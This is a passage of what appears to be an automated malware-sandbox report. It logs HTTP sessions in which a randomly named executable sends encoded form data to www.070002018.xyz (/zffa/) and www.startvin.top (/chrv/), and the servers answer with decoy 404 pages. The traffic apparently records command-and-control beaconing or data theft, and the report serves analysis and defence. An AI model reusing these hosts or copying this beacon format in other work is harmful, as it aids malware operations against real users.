                                                                  Data Raw: 30 50 49 58 42 66 39 3d 47 70 63 30 4a 78 39 32 73 44 58 4c 47 4d 55 76 32 57 46 47 75 6b 38 30 69 2f 6a 55 75 2b 6c 4f 70 6d 74 75 32 45 51 37 70 50 54 76 71 52 4f 42 58 5a 68 2b 30 67 75 62 57 73 33 49 56 2f 59 73 44 72 51 33 72 58 36 59 57 75 4b 68 75 7a 39 72 74 47 63 52 51 58 52 31 64 76 69 6b 4c 78 66 4b 79 68 51 36 79 71 45 78 36 73 30 66 41 71 4e 6c 67 52 57 61 6b 48 50 74 65 39 4d 38 62 78 46 62 55 36 71 48 61 71 56 69 4a 69 6e 49 62 79 41 66 50 34 67 48 72 5a 71 58 61 61 6e 4b 4e 6b 70 43 36 37 75 62 35 41 4c 73 7a 35 43 56 73 67 43 6c 6a 55 42 31 44 38 75 33 64 77 47 79 38 6b 33 49 30 79 73 4f 79 41 70 6a 31 6a 5a 71 37 78 32 32 78 51 3d 3d
                                                                  Data Ascii: 0PIXBf9=Gpc0Jx92sDXLGMUv2WFGuk80i/jUu+lOpmtu2EQ7pPTvqROBXZh+0gubWs3IV/YsDrQ3rX6YWuKhuz9rtGcRQXR1dvikLxfKyhQ6yqEx6s0fAqNlgRWakHPte9M8bxFbU6qHaqViJinIbyAfP4gHrZqXaanKNkpC67ub5ALsz5CVsgCljUB1D8u3dwGy8k3I0ysOyApj1jZq7x22xQ==
                                                                  Nov 18, 2024 13:14:19.154207945 CET1236INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 18 Nov 2024 12:14:19 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  ETag: W/"66cce1df-b96"
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                  Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                  Nov 18, 2024 13:14:19.154241085 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                  Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  22192.168.2.753170161.97.142.144803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:14:20.863195896 CET827OUTPOST /zffa/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 240
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.070002018.xyz
                                                                  Origin: http://www.070002018.xyz
                                                                  Referer: http://www.070002018.xyz/zffa/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 47 70 63 30 4a 78 39 32 73 44 58 4c 48 6f 6f 76 7a 31 64 47 2f 45 38 72 2b 50 6a 55 6e 65 6c 30 70 6d 70 75 32 41 49 72 70 64 33 76 71 77 2b 42 57 63 56 2b 7a 67 75 62 64 4d 33 51 52 2f 5a 75 44 72 4d 42 72 57 47 59 57 75 4f 68 75 77 70 72 71 78 77 65 42 58 52 33 49 2f 69 6d 50 78 66 4b 79 68 51 36 79 71 67 4c 36 73 4d 66 44 61 39 6c 68 30 69 5a 74 6e 50 75 4a 4e 4d 38 4b 68 46 66 55 36 71 31 61 76 31 49 4a 6e 6a 49 62 79 77 66 57 4b 45 45 68 5a 71 52 58 36 6d 45 43 30 6c 50 6a 5a 2b 6f 39 52 50 5a 2b 59 71 50 6b 32 44 48 35 32 4e 5a 64 74 57 4d 5a 79 69 45 72 43 71 39 32 7a 6f 57 2f 69 64 43 71 55 38 41 32 6a 58 79 6e 67 50 57 6a 6d 6d 51 44 4d 74 64 79 44 76 6a 61 53 4c 59 37 46 6f 3d
                                                                  Data Ascii: 0PIXBf9=Gpc0Jx92sDXLHoovz1dG/E8r+PjUnel0pmpu2AIrpd3vqw+BWcV+zgubdM3QR/ZuDrMBrWGYWuOhuwprqxweBXR3I/imPxfKyhQ6yqgL6sMfDa9lh0iZtnPuJNM8KhFfU6q1av1IJnjIbywfWKEEhZqRX6mEC0lPjZ+o9RPZ+YqPk2DH52NZdtWMZyiErCq92zoW/idCqU8A2jXyngPWjmmQDMtdyDvjaSLY7Fo=
                                                                  Nov 18, 2024 13:14:21.698690891 CET1236INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 18 Nov 2024 12:14:21 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  ETag: W/"66cce1df-b96"
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                  Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                  Nov 18, 2024 13:14:21.698707104 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                  Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  23192.168.2.753171161.97.142.144803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:14:23.595905066 CET1840OUTPOST /zffa/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 1252
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.070002018.xyz
                                                                  Origin: http://www.070002018.xyz
                                                                  Referer: http://www.070002018.xyz/zffa/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 47 70 63 30 4a 78 39 32 73 44 58 4c 48 6f 6f 76 7a 31 64 47 2f 45 38 72 2b 50 6a 55 6e 65 6c 30 70 6d 70 75 32 41 49 72 70 64 2f 76 72 47 71 42 58 2f 39 2b 79 67 75 62 44 38 33 45 52 2f 59 32 44 72 45 64 72 57 4b 49 57 73 47 68 73 53 78 72 72 44 49 65 49 58 52 33 4b 2f 69 6e 4c 78 66 36 79 6c 4d 2b 79 71 77 4c 36 73 4d 66 44 63 5a 6c 31 52 57 5a 68 48 50 74 65 39 4d 77 62 78 45 34 55 36 44 41 61 76 35 79 4a 55 72 49 63 57 55 66 4e 5a 67 45 38 4a 71 54 55 36 6e 5a 43 30 6f 50 6a 5a 53 65 39 52 71 30 2b 5a 65 50 31 51 4f 67 6a 48 42 64 41 39 65 77 51 67 43 43 67 67 47 79 79 43 73 4e 77 6a 74 69 33 6d 4d 30 74 56 7a 6a 74 30 53 7a 36 32 4b 76 61 2b 35 50 38 57 43 35 4f 77 48 4c 6b 42 51 47 41 69 49 72 6b 78 76 49 75 58 70 65 56 77 50 65 70 67 6d 31 49 72 56 4f 64 59 78 63 35 70 46 66 63 75 64 62 4c 79 35 78 56 42 61 77 53 72 56 69 2b 4f 4e 46 62 2f 2b 34 6b 32 57 50 79 49 50 73 4e 32 4d 4f 77 71 49 6d 34 4c 49 52 49 45 72 6c 63 6a 66 50 30 67 79 57 4b 77 2b 30 4a 5a 37 61 39 75 [TRUNCATED]
                                                                  Data Ascii: 0PIXBf9=Gpc0Jx92sDXLHoovz1dG/E8r+PjUnel0pmpu2AIrpd/vrGqBX/9+ygubD83ER/Y2DrEdrWKIWsGhsSxrrDIeIXR3K/inLxf6ylM+yqwL6sMfDcZl1RWZhHPte9MwbxE4U6DAav5yJUrIcWUfNZgE8JqTU6nZC0oPjZSe9Rq0+ZeP1QOgjHBdA9ewQgCCggGyyCsNwjti3mM0tVzjt0Sz62Kva+5P8WC5OwHLkBQGAiIrkxvIuXpeVwPepgm1IrVOdYxc5pFfcudbLy5xVBawSrVi+ONFb/+4k2WPyIPsN2MOwqIm4LIRIErlcjfP0gyWKw+0JZ7a9uzGUlUkQQwEpPtLnrD+sssxxmrS4BotbownomSD/VpFWJiV3InhhMyMiQThAyiGUyK1nvQyTxW+IsVoTwApcd4FKf/8lyFI5HYjRh7PqsIl4ygvnePjj3ldzzmyKCjpfT0gwV2msM7kZjgUx+Q9bNW3X0AM0EKg4j5pBhIUJGz+PONb8xQIQYCRJRLLdMatIq+YLXHgxrY20PXW88gO0iy751KJzqdgxGgYBspIz5Bj396F74Wv1eM5/EZ3CgmFGxmr9keMq+rT3l9fVNjrXKJnv8cM2qCH1jSzDo6Y1mpcUGrl2LtMidCjAQetdKLlABK1G/Tz73CmcYRVHDrnLImNWrTKEiGIEkiChvKpoa90TXHDdFV7pFg4i4hgK0rgsa/6MRrbDrysspaP7L6fLFsu83Y8Hq8UiF1g8F74DvW3H6k4jASZnkCboNCBEAND/4GBPSpurBe89HXzRGV266+McfVobulKFFLbXkgaBjPbU4iCLDSamHgpdNa+9wrNFcBm28Y/SMSBvtERjwF757BaEU1VGV5G2RsfYPZyKg/qfS2K+ABvgE8FOzGAQVGZ86E+tixt2OZctk8Nn1pCBqxG98wpWgQD+o+p2DbMr6mF25f4KPXHKyP5H4lVrSg+r9HHbFeM7gxMTbs2aqEDjaDMZ+aDuzQPzHia [TRUNCATED]
                                                                  Nov 18, 2024 13:14:24.360114098 CET1236INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 18 Nov 2024 12:14:24 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  ETag: W/"66cce1df-b96"
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                  Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                  Nov 18, 2024 13:14:24.360138893 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                  Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  24192.168.2.753172161.97.142.144803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:14:26.173993111 CET542OUTGET /zffa/?0PIXBf9=Lr0UKEZNgDTJN6gT+Us371Y8hMyDvaQkpz1n9V5B19O6mDyNa8d38Q+pA9qLUvQ8A8Z/r2CCV5OH4hlRsxt9M39/KtueIxj6h2UJ95Aou8NDO7hK3C23zz+4LvY5JlduZs+ECZ1LIizb&tD_=f00xUVKh HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Connection: close
                                                                  Host: www.070002018.xyz
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Nov 18, 2024 13:14:27.024132967 CET1236INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 18 Nov 2024 12:14:26 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 2966
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  ETag: "66cce1df-b96"
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                  Nov 18, 2024 13:14:27.024188042 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                  Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                  Nov 18, 2024 13:14:27.024202108 CET424INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                  Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
                                                                  Nov 18, 2024 13:14:27.028852940 CET274INData Raw: 6e 69 6d 61 74 65 5f 5f 64 65 6c 61 79 2d 31 73 22 3e 0a 09 09 09 09 09 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f
                                                                  Data Ascii: nimate__delay-1s"><p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  25192.168.2.753173203.161.46.205803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:14:32.937556982 CET804OUTPOST /chrv/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 220
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.startvin.top
                                                                  Origin: http://www.startvin.top
                                                                  Referer: http://www.startvin.top/chrv/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 6c 6f 67 50 4d 59 65 44 56 5a 71 6f 58 33 30 63 77 4f 35 75 42 6a 79 57 5a 2b 33 43 63 48 37 32 76 57 54 30 65 46 4b 6b 69 6f 6b 73 66 6d 4d 53 66 6e 52 62 2f 7a 61 76 6d 42 35 6a 57 37 58 42 56 67 4f 55 53 43 42 56 32 71 33 38 64 33 59 4b 52 78 4a 71 6d 67 2b 47 2f 73 45 36 32 69 73 2f 56 76 4f 54 2b 45 6a 33 32 61 36 55 5a 61 2b 48 39 42 45 77 54 32 4e 53 56 67 6f 44 71 67 72 73 31 64 77 53 53 6f 2f 6d 76 62 77 4c 6e 73 4a 79 37 34 35 76 31 4f 59 32 4a 6a 41 62 45 30 6b 61 56 34 64 6e 36 7a 68 4a 62 68 41 50 41 34 72 36 6f 55 67 59 37 71 69 37 79 42 52 7a 52 69 34 5a 41 78 57 42 68 41 70 44 43 42 53 48 41 75 4d 79 30 51 3d 3d
                                                                  Data Ascii: 0PIXBf9=logPMYeDVZqoX30cwO5uBjyWZ+3CcH72vWT0eFKkioksfmMSfnRb/zavmB5jW7XBVgOUSCBV2q38d3YKRxJqmg+G/sE62is/VvOT+Ej32a6UZa+H9BEwT2NSVgoDqgrs1dwSSo/mvbwLnsJy745v1OY2JjAbE0kaV4dn6zhJbhAPA4r6oUgY7qi7yBRzRi4ZAxWBhApDCBSHAuMy0Q==
                                                                  Nov 18, 2024 13:14:33.633407116 CET1236INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 18 Nov 2024 12:14:33 GMT
                                                                  Server: Apache
                                                                  Content-Length: 16052
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 